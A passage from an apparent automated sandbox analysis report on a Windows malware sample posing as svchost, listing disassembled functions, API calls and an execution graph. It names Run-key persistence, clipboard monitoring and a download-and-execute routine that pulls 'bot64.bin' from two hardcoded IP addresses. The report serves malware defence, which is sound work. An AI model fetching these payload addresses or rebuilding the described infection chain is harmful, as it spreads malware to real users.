                                                                                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                                                                                    • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                                                    • API String ID: 779948276-85274793
                                                                                                                                                                                                                                                    • Opcode ID: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction ID: 4780317073817a78921096e14ab5805cdaf9e6ca987706fc556426dd7cc3c946
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8001D776618A818AD7508F14F84475AB7A4F7A8794F901225FA8D83B68DFBEC144CB05
                                                                                                                                                                                                                                                    Function 00007FF6EEF238B8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                                                    • API String ID: 779948276-1428018034
                                                                                                                                                                                                                                                    • Opcode ID: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction ID: a1595195bdcb752ee562f315fc25f657537f7c4e2f3eee8051a41953106654cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE116373528B8186D7908B14F44076A77A0FBA87A0F515231F9AE83BE8DFBDD184CB05
                                                                                                                                                                                                                                                    Function 00007FF6EEF249BF Relevance: 6.3, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocCloseFreeHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2328737614-0
                                                                                                                                                                                                                                                    • Opcode ID: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction ID: dc72ab54a40ba4171859517ef7c687ac13625ae048607f1d865b71356d55412f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48311D26608BC182DB64CB59F4903AAB7A0F7E8B91F015126EE8DC77A8DF7DD0458B05
                                                                                                                                                                                                                                                    Function 00007FF6EEF22ED0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetOpenW.WININET ref: 00007FF6EEF21C64
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: Sleep.KERNEL32 ref: 00007FF6EEF21C7C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetOpenUrlW.WININET ref: 00007FF6EEF21CA8
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetOpenUrlW.WININET ref: 00007FF6EEF21CDF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetCloseHandle.WININET ref: 00007FF6EEF21CF7
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: Sleep.KERNEL32 ref: 00007FF6EEF21D02
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: HttpQueryInfoA.WININET ref: 00007FF6EEF21D32
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetCloseHandle.WININET ref: 00007FF6EEF21D41
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetCloseHandle.WININET ref: 00007FF6EEF21D4C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: Sleep.KERNEL32 ref: 00007FF6EEF21D57
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetCloseHandle.WININET ref: 00007FF6EEF21D71
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetOpenUrlW.WININET ref: 00007FF6EEF21D9B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetCloseHandle.WININET ref: 00007FF6EEF21DB3
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: Sleep.KERNEL32 ref: 00007FF6EEF21DBE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: HttpQueryInfoA.WININET ref: 00007FF6EEF21DF6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: GetProcessHeap.KERNEL32 ref: 00007FF6EEF21E05
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: HeapAlloc.KERNEL32 ref: 00007FF6EEF21E1B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF21C20: InternetCloseHandle.WININET ref: 00007FF6EEF21E33
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23FE8: GetCurrentProcess.KERNEL32 ref: 00007FF6EEF2404F
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23FE8: OpenProcessToken.ADVAPI32 ref: 00007FF6EEF24062
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23FE8: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6EEF2408A
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23FE8: AdjustTokenPrivileges.KERNELBASE ref: 00007FF6EEF240B5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23FE8: CloseHandle.KERNEL32 ref: 00007FF6EEF240C0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23FE8: OpenProcess.KERNEL32 ref: 00007FF6EEF240D5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23FE8: CloseHandle.KERNEL32 ref: 00007FF6EEF2414D
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 00007FF6EEF22F3C
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32 ref: 00007FF6EEF22F4C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$Open$Process$HeapSleep$HttpInfoQueryToken$AdjustAllocCurrentFreeLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                    • String ID: http://176.111.174.140/bin/bot64.bin$http://176.111.174.177/bin/bot64.bin
                                                                                                                                                                                                                                                    • API String ID: 482118104-517461732
                                                                                                                                                                                                                                                    • Opcode ID: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction ID: b141df64c189543933fc00d4a25452f50713350990b413ea3e2eae9c0927ad61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6011A62E0968382E710EB14F8553E527A0AFBC754F528035F84CC33A5CFBEE5558B8A

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:1.3%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:8.2%
                                                                                                                                                                                                                                                    Total number of Nodes:462
                                                                                                                                                                                                                                                    Total number of Limit Nodes:56
                                                                                                                                                                                                                                                    execution_graph 112433 e90dbb0 112434 e90dbcc 112433->112434 112438 e90dbd1 112433->112438 112447 e91531c GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 GetTickCount64 QueryPerformanceCounter 112434->112447 112436 e90dc5c 112444 e90dc26 112436->112444 112449 e90a0a0 112436->112449 112438->112436 112438->112444 112448 e90da58 68 API calls 15 library calls 112438->112448 112439 e90dc7a 112441 e90dca3 112439->112441 112443 e90a0a0 _DllMainCRTStartup 368 API calls 112439->112443 112441->112444 112459 e90da58 68 API calls 15 library calls 112441->112459 112445 e90dc96 112443->112445 112458 e90da58 68 API calls 15 library calls 112445->112458 112447->112438 112448->112436 112450 e90a0c0 _DllMainCRTStartup 112449->112450 112451 e90a0a8 112449->112451 112493 e8f8260 19 API calls 2 library calls 112450->112493 112452 e90a0cc 112451->112452 112460 e8f4710 LoadLibraryA GetProcAddress 112451->112460 112452->112439 112454 e90a0b1 112466 e909ef0 112454->112466 112458->112441 112459->112444 112461 e8f531d _DllMainCRTStartup 112460->112461 112462 e8f53d1 _DllMainCRTStartup 112461->112462 112463 e8f53f1 GetProcAddress 112462->112463 112464 e8f5423 156 API calls 112463->112464 112465 e8f62f3 _DllMainCRTStartup 112464->112465 112465->112454 112494 e9046a0 112466->112494 112469 e909f57 _DllMainCRTStartup 112471 e909f9d _DllMainCRTStartup 112469->112471 112496 e909ea0 CreateMutexA 112469->112496 112474 e909fb6 _DllMainCRTStartup 112471->112474 112517 e909d90 Sleep GetProcAddress LoadLibraryA GetProcAddress _DllMainCRTStartup 112471->112517 112473 e909f69 112473->112471 112499 e8f1ec0 112473->112499 112479 e909fd4 _DllMainCRTStartup 112474->112479 112518 e905a60 80 API calls 3 library calls 112474->112518 112476 e909f77 CreateThread 112508 e904cf0 112476->112508 112690 e907de0 112476->112690 112481 e909ff2 _DllMainCRTStartup 112479->112481 112519 e905cf0 75 API calls 3 library calls 112479->112519 112483 e90a010 _DllMainCRTStartup 112481->112483 112520 e905f80 80 API calls 3 library calls 112481->112520 112484 e90a02e _DllMainCRTStartup 112483->112484 112521 e905a60 80 API calls 3 library calls 112483->112521 112485 e90a042 112484->112485 112486 e90a04e CreateThread 112484->112486 112522 e905a60 80 API calls 3 library calls 112485->112522 112488 e90a06f 112486->112488 112523 e90cb90 112488->112523 112491 e90a081 112491->112439 112492 e90a04c 112492->112488 112493->112452 112495 e9046ac GetModuleFileNameA PathFindFileNameA 112494->112495 112495->112469 112497 e909ece GetLastError 112496->112497 112498 e909ebe __termconin 112496->112498 112497->112498 112498->112473 112530 e8f1670 112499->112530 112501 e8f1ede _DllMainCRTStartup 112545 e8f81f0 112501->112545 112503 e8f1efb 112548 e8f8120 112503->112548 112506 e8f8120 _DllMainCRTStartup GetProcAddress 112507 e8f1f3d _DllMainCRTStartup 112506->112507 112507->112476 112561 e904b50 112508->112561 112517->112474 112518->112479 112519->112481 112520->112483 112521->112484 112522->112492 112524 e90cb99 112523->112524 112525 e90d0f4 IsProcessorFeaturePresent 112524->112525 112526 e90cba4 112524->112526 112527 e90d10b 112525->112527 112526->112491 112689 e913a48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 112527->112689 112529 e90d11e 112529->112491 112531 e8f1690 InternetOpenW 112530->112531 112532 e8f16b3 Sleep 112531->112532 112533 e8f16c0 InternetOpenUrlW 112531->112533 112532->112531 112534 e8f16e7 InternetOpenUrlW 112533->112534 112536 e8f1727 _DllMainCRTStartup 112533->112536 112535 e8f170e InternetCloseHandle Sleep 112534->112535 112534->112536 112535->112531 112537 e8f1750 InternetCloseHandle InternetCloseHandle Sleep 112536->112537 112538 e8f177c InternetCloseHandle InternetOpenUrlW 112536->112538 112540 e8f17c5 _heap_init _DllMainCRTStartup 112536->112540 112537->112531 112539 e8f17ac InternetCloseHandle Sleep 112538->112539 112538->112540 112539->112531 112541 e8f1801 HeapAlloc 112540->112541 112542 e8f181d InternetCloseHandle InternetCloseHandle 112541->112542 112544 e8f183f _DllMainCRTStartup 112541->112544 112542->112501 112543 e8f1892 InternetCloseHandle InternetCloseHandle 112543->112501 112544->112543 112551 e8f7ca0 112545->112551 112547 e8f81fd _DllMainCRTStartup 112547->112503 112556 e8f8140 112548->112556 112550 e8f1f1c 112550->112506 112552 e8f7cbd Sleep 112551->112552 112553 e8f7ce1 112551->112553 112552->112553 112553->112547 112557 e8f815e __crtIsPackagedApp 112556->112557 112558 e8f8178 GetProcAddress 112557->112558 112559 e8f8163 112557->112559 112560 e8f818c 112558->112560 112559->112550 112560->112550 112562 e904b95 _ld12tod 112561->112562 112563 e904bfd GetUserNameW GetComputerNameW 112562->112563 112585 e8fea80 112563->112585 112565 e904c35 112566 e8fea80 _DllMainCRTStartup 3 API calls 112565->112566 112567 e904c44 _DllMainCRTStartup 112566->112567 112568 e904c63 wsprintfA 112567->112568 112592 e8f8890 112568->112592 112570 e904cb4 _DllMainCRTStartup 112571 e90cb90 __get_qualified_locale 4 API calls 112570->112571 112572 e904ccc 112571->112572 112573 e9046d0 112572->112573 112574 e904700 _DllMainCRTStartup 112573->112574 112575 e8f8890 _DllMainCRTStartup 39 API calls 112574->112575 112576 e904741 _DllMainCRTStartup 112575->112576 112577 e904760 112576->112577 112580 e904765 _DllMainCRTStartup 112576->112580 112582 e904770 _DllMainCRTStartup 112576->112582 112579 e904b50 _DllMainCRTStartup 45 API calls 112577->112579 112578 e9047db SleepEx 112579->112580 112580->112578 112581 e90477e StrStrA 112581->112582 112582->112580 112582->112581 112583 e9047a5 strtol 112582->112583 112659 e904a40 112583->112659 112586 e8fea8e 112585->112586 112587 e8fea96 WideCharToMultiByte 112585->112587 112586->112565 112588 e8feacf 112587->112588 112589 e8feae1 malloc 112587->112589 112588->112565 112590 e8feaf8 WideCharToMultiByte 112589->112590 112591 e8feb22 112589->112591 112590->112591 112591->112565 112593 e8f89ea memcpy lstrlenA 112592->112593 112597 e8f88cd __lock_fhandle _DllMainCRTStartup 112592->112597 112617 e8fe820 112593->112617 112612 e8fe450 GetWindowsDirectoryA GetVolumeInformationA 112597->112612 112598 e8f8a6a 112599 e8fe820 _DllMainCRTStartup lstrlenA 112598->112599 112600 e8f8a7f 112599->112600 112605 e90cb90 __get_qualified_locale 4 API calls 112600->112605 112602 e8f8a31 112602->112598 112604 e8f6700 _DllMainCRTStartup 31 API calls 112602->112604 112603 e8f892c _DllMainCRTStartup 112607 e8f8943 lstrcatA lstrcatA 112603->112607 112604->112602 112606 e8f8aa4 112605->112606 112606->112570 112608 e8f6700 _DllMainCRTStartup 31 API calls 112607->112608 112610 e8f899c 112608->112610 112609 e8f89cf _mtinitlocknum 112609->112593 112610->112609 112611 e8f6700 _DllMainCRTStartup 31 API calls 112610->112611 112611->112610 112613 e8fe4f6 _DllMainCRTStartup 112612->112613 112614 e8fe52a wsprintfA 112613->112614 112615 e90cb90 __get_qualified_locale 4 API calls 112614->112615 112616 e8fe559 112615->112616 112616->112603 112618 e8f8a27 112617->112618 112619 e8fe824 112617->112619 112621 e8f6700 112618->112621 112620 e8fe842 lstrlenA 112619->112620 112620->112618 112620->112620 112622 e8f6743 _ld12tod _DllMainCRTStartup 112621->112622 112623 e8f6764 lstrcatA lstrcatA lstrcatA lstrcatA lstrcatA 112622->112623 112624 e8f67c6 112623->112624 112625 e8f6820 lstrcatA 112623->112625 112624->112625 112627 e8f67cc lstrcatA wsprintfA lstrcatA lstrcatA 112624->112627 112626 e8f686c _DllMainCRTStartup 112625->112626 112628 e8f6874 socket 112626->112628 112633 e8f6cb0 _DllMainCRTStartup 112626->112633 112627->112625 112629 e8f6895 gethostbyname 112628->112629 112628->112633 112630 e8f68a8 memcpy htons 112629->112630 112629->112633 112631 e8f68e5 _DllMainCRTStartup 112630->112631 112632 e8f68ee lstrlenA 112631->112632 112631->112633 112648 e8f6911 _ld12tod _DllMainCRTStartup 112632->112648 112634 e90cb90 __get_qualified_locale 4 API calls 112633->112634 112635 e8f6d54 112634->112635 112635->112602 112636 e8f6d65 112658 e90d1c8 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind __report_securityfailure 112636->112658 112638 e8f6a0a lstrlenA 112640 e8f6ad9 112638->112640 112641 e8f6a25 StrStrA 112638->112641 112639 e8f6d6a 112642 e8f6ae2 112640->112642 112644 e8f6c8c 112640->112644 112645 e8f6af4 malloc 112640->112645 112641->112648 112642->112633 112643 e8f6aea 112642->112643 112643->112645 112646 e8f6cdc malloc 112644->112646 112647 e8f6c91 malloc 112644->112647 112656 e8f6b30 _DllMainCRTStartup 112645->112656 112646->112633 112647->112633 112648->112633 112648->112636 112648->112638 112649 e8f6a58 strtol 112648->112649 112649->112633 112649->112648 112650 e8f6c70 112650->112633 112651 e8f6d5f 112657 e90d1c8 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind __report_securityfailure 112651->112657 112652 e8f6b86 strtol 112652->112633 112652->112656 112654 e8f6d64 112654->112636 112655 e8f6bda realloc 112655->112656 112656->112633 112656->112650 112656->112651 112656->112652 112656->112655 112657->112654 112658->112639 112660 e904b01 _ld12tod 112659->112660 112665 e904a66 _ld12tod 112659->112665 112663 e9047e0 _DllMainCRTStartup 42 API calls 112660->112663 112661 e904b2c 112662 e90cb90 __get_qualified_locale 4 API calls 112661->112662 112664 e904b3c 112662->112664 112663->112661 112664->112582 112665->112661 112671 e9047e0 112665->112671 112668 e904abb 112688 e8fe570 13 API calls 2 library calls 112668->112688 112670 e904ac8 DeleteFileA CopyFileA SetFileAttributesA 112670->112661 112672 e904827 _ld12tod 112671->112672 112673 e90485e lstrlenA InternetCrackUrlA 112672->112673 112674 e9049d2 _DllMainCRTStartup 112673->112674 112677 e9048a5 _ld12tod 112673->112677 112675 e90cb90 __get_qualified_locale 4 API calls 112674->112675 112676 e904a26 112675->112676 112676->112661 112676->112668 112677->112674 112678 e8f6700 _DllMainCRTStartup 31 API calls 112677->112678 112680 e9048eb _DllMainCRTStartup 112678->112680 112679 e90490d PathFindFileNameA 112679->112674 112681 e904927 _DllMainCRTStartup 112679->112681 112680->112674 112680->112679 112682 e904935 GetTempFileNameA lstrcatA lstrcatA CreateFileA 112681->112682 112682->112674 112683 e904998 WriteFile 112682->112683 112684 e904a01 CloseHandle 112683->112684 112685 e9049b9 _DllMainCRTStartup 112683->112685 112684->112674 112686 e9049c4 CloseHandle 112685->112686 112686->112674 112687 e9049d9 ShellExecuteA 112686->112687 112687->112674 112687->112684 112688->112670 112689->112529 112697 e907e0a _DllMainCRTStartup 112690->112697 112692 e908530 36 API calls 112699 e907e48 _DllMainCRTStartup 112692->112699 112693 e8f2e40 67 API calls _DllMainCRTStartup 112693->112697 112694 e8f2e40 67 API calls _DllMainCRTStartup 112694->112699 112695 e8f1100 36 API calls _DllMainCRTStartup 112695->112699 112696 e9084c0 36 API calls 112696->112697 112697->112693 112697->112696 112698 e90833b Sleep 112697->112698 112697->112699 112701 e908390 OpenClipboard 112697->112701 112698->112697 112699->112692 112699->112694 112699->112695 112699->112697 112699->112698 112700 e908580 7 API calls 112699->112700 112700->112699 112702 e908404 112701->112702 112703 e9083ab GetClipboardData 112701->112703 112713 e8f2e40 112702->112713 112705 e9083c1 GlobalLock 112703->112705 112706 e9083db CloseClipboard 112703->112706 112705->112706 112708 e9083cf GlobalUnlock 112705->112708 112706->112702 112709 e9083eb 112706->112709 112707 e908413 112707->112697 112708->112706 112712 e8f1100 36 API calls _DllMainCRTStartup 112709->112712 112711 e9083f6 112711->112697 112712->112711 112714 e8f2e5d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 112713->112714 112717 e8f22a0 112714->112717 112716 e8f2e94 112716->112707 112718 e8f22c9 _DllMainCRTStartup 112717->112718 112719 e8f2366 112718->112719 112720 e8f22d2 _DllMainCRTStartup 112718->112720 112734 e8f2260 36 API calls _DllMainCRTStartup 112719->112734 112723 e8f230c 112720->112723 112724 e8f22f4 112720->112724 112733 e8f20b0 36 API calls _DllMainCRTStartup 112723->112733 112731 e8f2610 67 API calls _DllMainCRTStartup 112724->112731 112727 e8f22fd 112732 e8f2590 67 API calls _DllMainCRTStartup 112727->112732 112729 e8f230a 112730 e8f2317 char_traits _DllMainCRTStartup 112729->112730 112730->112716 112731->112727 112732->112729 112733->112730 112856 f4bdbb0 112857 f4bdbcc 112856->112857 112858 f4bdbd1 112856->112858 112870 f4c531c GetSystemTimeAsFileTime GetCurrentThreadId GetTickCount64 GetTickCount64 QueryPerformanceCounter 112857->112870 112864 f4bdc5c 112858->112864 112868 f4bdc26 112858->112868 112871 f4bda58 66 API calls 15 library calls 112858->112871 112861 f4bdc7a 112863 f4bdca3 112861->112863 112865 f4ba0a0 _DllMainCRTStartup 368 API calls 112861->112865 112863->112868 112882 f4bda58 66 API calls 15 library calls 112863->112882 112864->112868 112872 f4ba0a0 112864->112872 112867 f4bdc96 112865->112867 112881 f4bda58 66 API calls 15 library calls 112867->112881 112870->112858 112871->112864 112873 f4ba0a8 112872->112873 112874 f4ba0c0 _DllMainCRTStartup 112872->112874 112875 f4ba0cc 112873->112875 112916 f4a4710 159 API calls _DllMainCRTStartup 112873->112916 112917 f4a8260 20 API calls 2 library calls 112874->112917 112875->112861 112877 f4ba0b1 112883 f4b9ef0 112877->112883 112881->112863 112882->112868 112918 f4b46a0 112883->112918 112886 f4b9f57 _DllMainCRTStartup 112887 f4b9f9d _DllMainCRTStartup 112886->112887 112920 f4b9ea0 CreateMutexA 112886->112920 112890 f4b9fb1 112887->112890 112891 f4b9fb6 _DllMainCRTStartup 112887->112891 112889 f4b9f69 112889->112887 112892 f4b9f6d 112889->112892 112925 f4b9d90 Sleep GetProcAddress LoadLibraryA GetProcAddress _DllMainCRTStartup 112890->112925 112894 f4b9fca 112891->112894 112895 f4b9fd4 _DllMainCRTStartup 112891->112895 112923 f4a1ec0 20 API calls _DllMainCRTStartup 112892->112923 112926 f4b5a60 79 API calls 2 library calls 112894->112926 112900 f4b9fe8 112895->112900 112901 f4b9ff2 _DllMainCRTStartup 112895->112901 112897 f4b9f77 CreateThread 112924 f4b4cf0 73 API calls _DllMainCRTStartup 112897->112924 112927 f4b5cf0 74 API calls 2 library calls 112900->112927 112902 f4ba010 _DllMainCRTStartup 112901->112902 112903 f4ba006 112901->112903 112906 f4ba02e _DllMainCRTStartup 112902->112906 112907 f4ba024 112902->112907 112928 f4b5f80 79 API calls 2 library calls 112903->112928 112908 f4ba04e CreateThread 112906->112908 112909 f4ba042 112906->112909 112929 f4b5a60 79 API calls 2 library calls 112907->112929 112911 f4ba06f 112908->112911 112932 f4b7de0 112908->112932 112930 f4b5a60 79 API calls 2 library calls 112909->112930 112931 f4bcb90 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind __crtCapturePreviousContext 112911->112931 112914 f4ba081 112914->112861 112915 f4ba04c 112915->112911 112916->112877 112917->112875 112919 f4b46ac GetModuleFileNameA PathFindFileNameA 112918->112919 112919->112886 112921 f4b9ece GetLastError 112920->112921 112922 f4b9ebe __termconin 112920->112922 112921->112922 112922->112889 112923->112897 112924->112887 112925->112891 112926->112895 112927->112901 112928->112902 112929->112906 112930->112915 112931->112914 112938 f4b7e0a _DllMainCRTStartup 112932->112938 112934 f4a2e40 66 API calls _DllMainCRTStartup 112934->112938 112935 f4b8580 7 API calls 112942 f4b7e48 _DllMainCRTStartup 112935->112942 112936 f4b84c0 35 API calls 112936->112938 112937 f4a2e40 66 API calls _DllMainCRTStartup 112937->112942 112938->112934 112938->112936 112940 f4b833b Sleep 112938->112940 112938->112942 112943 f4b8390 OpenClipboard 112938->112943 112939 f4a1100 35 API calls _DllMainCRTStartup 112939->112942 112940->112938 112941 f4b8530 35 API calls 112941->112942 112942->112935 112942->112937 112942->112938 112942->112939 112942->112940 112942->112941 112944 f4b83ab GetClipboardData 112943->112944 112945 f4b8404 112943->112945 112946 f4b83db CloseClipboard 112944->112946 112947 f4b83c1 GlobalLock 112944->112947 112955 f4a2e40 112945->112955 112946->112945 112950 f4b83eb 112946->112950 112947->112946 112949 f4b83cf GlobalUnlock 112947->112949 112949->112946 112954 f4a1100 35 API calls _DllMainCRTStartup 112950->112954 112951 f4b8413 112951->112938 112953 f4b83f6 112953->112938 112954->112953 112956 f4a2e5d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 112955->112956 112959 f4a22a0 112956->112959 112958 f4a2e94 112958->112951 112960 f4a22c9 _DllMainCRTStartup 112959->112960 112961 f4a22d2 _DllMainCRTStartup 112960->112961 112962 f4a2366 112960->112962 112965 f4a230c 112961->112965 112966 f4a22f4 112961->112966 112976 f4a2260 35 API calls _DllMainCRTStartup 112962->112976 112975 f4a20b0 35 API calls _DllMainCRTStartup 112965->112975 112973 f4a2610 66 API calls _DllMainCRTStartup 112966->112973 112969 f4a22fd 112974 f4a2590 66 API calls _DllMainCRTStartup 112969->112974 112970 f4a2317 char_traits _DllMainCRTStartup 112970->112958 112972 f4a230a 112972->112970 112973->112969 112974->112972 112975->112970 112977 e8f7b90 112978 e8f7bc9 VirtualProtect 112977->112978 112979 e8f7bc1 112977->112979 112980 e8f7bee VirtualProtect 112978->112980 112981 e8f7be4 112978->112981 112979->112978 112983 e91f100 112980->112983 112984 e8f7c4f FlushInstructionCache 112983->112984 112984->112981 112985 e8f7f90 112986 e8f7ca0 _DllMainCRTStartup Sleep 112985->112986 112988 e8f7fba _DllMainCRTStartup 112986->112988 112987 e8f80e2 _DllMainCRTStartup 112989 e90cb90 __get_qualified_locale 4 API calls 112987->112989 112988->112987 113002 e8f6d70 112988->113002 112990 e8f8112 112989->112990 112994 e8f8022 112995 e8f802a 112994->112995 112996 e8f80d5 112994->112996 113006 e8f7910 HeapAlloc HeapReAlloc 112995->113006 113008 e8f6ed0 VirtualFree VirtualFree 112996->113008 112999 e8f802f 113000 e8f803b 112999->113000 113007 e8f6ed0 VirtualFree VirtualFree 112999->113007 113000->112987 113009 e8f6f50 GetSystemInfo 113002->113009 113004 e8f6d79 113004->112987 113005 e8f84a0 4 API calls 2 library calls 113004->113005 113005->112994 113006->112999 113007->113000 113008->112987 113010 e8f6f85 _DllMainCRTStartup 113009->113010 113010->113004 113011 e8f7ee0 113018 e8f7cf0 113011->113018 113013 e8f7f0c __termconin 113014 e8f7f20 OpenThread 113013->113014 113016 e8f7f63 113013->113016 113014->113013 113015 e8f7f3c SuspendThread 113014->113015 113028 e8f82e0 GetThreadContext 113015->113028 113027 e8f7d16 _DllMainCRTStartup 113018->113027 113019 e8f7ded __termconin 113020 e90cb90 __get_qualified_locale 4 API calls 113019->113020 113021 e8f7e03 113020->113021 113021->113013 113022 e8f7dd0 